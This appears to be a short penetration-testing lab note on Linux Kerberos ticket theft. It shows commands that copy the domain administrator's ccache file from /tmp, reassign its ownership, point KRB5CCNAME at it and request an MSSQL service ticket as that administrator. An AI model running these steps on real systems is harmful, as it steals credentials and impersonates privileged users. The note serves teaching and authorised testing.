Credential Cache Files

If we compromise an active user’s shell session, we can essentially act as the user in question and use their current Kerberos tickets. Gaining an initial TGT would require the user’s Active Directory password. However, if the user is already authenticated, we can just use their current tickets.

A user’s ccache file is stored in /tmp with a format like /tmp/krb5cc_

The file is typically only accessible by the owner. Because of this, it’s unlikely that we will be able to steal a user’s ccache file as an unprivileged user.

Note that even as root you may not be able to access other users cache files in /tmp

ls -al /tmp/krb5cc_*

/tmp/krb5cc_607000500_3aeIA5

copy the domain administrator’s ccache file and set the ownership of the new file to our offsec user.

sudo cp /tmp/krb5cc_607000500_3aeIA5 /tmp/krb5cc_minenow
sudo chown offsec:offsec /tmp/krb5cc_minenow

In order to use the ccache file, we need to set the KRB5CCNAME environment variable

kdestroy
export KRB5CCNAME=/tmp/krb5cc_minenow

We now have the administrator user’s TGT in our credential cache and we can request service tickets on their behalf.

kvno MSSQLSvc/DC01.corp1.com:1433

Last updated 1 year ago